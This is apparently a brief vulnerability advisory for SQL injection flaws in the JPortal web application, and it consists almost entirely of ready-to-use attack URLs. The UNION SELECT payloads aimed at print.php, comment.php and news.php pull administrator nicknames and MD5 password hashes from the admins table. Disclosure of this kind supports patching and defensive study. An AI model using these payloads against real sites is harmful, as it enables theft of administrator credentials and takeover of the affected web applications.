|
JPortal Multiple SQL Injection Vulnerabilities
No exploit is required. Example URI have been provided: http://www.example.com/print.php?what=article&id=<articleid>%20AND%201=0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,id%20from%20admins%20LIMIT%201 http://www.example.com/comment.php?what=news&id=<news id> and 1=0 union (select null, null, nick, null, null, null, null, null, null, null, null, null from admins limit n,1) got admin nick http://www.example.com/comment.php?what=news&id=<news id> and 1=0 union (select null, null, pass, null, null, null, null, null, null, null, null, null from admins limit n,1) got md5 password http://www.example.com/print.php?what=article&id=<article id> AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1 http://www.example.com/news.php?id=<newsid>%20AND%200%20=%201%20UNION%20SELECT%20*,%201,%201,%201,%201%20FROM%20admins%20-- http://www.example.com/print.php?what=article&id=<articleid>%20AND%201=0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,id%20from%20admins%20LIMIT%201 |
|
|
Privacy Statement |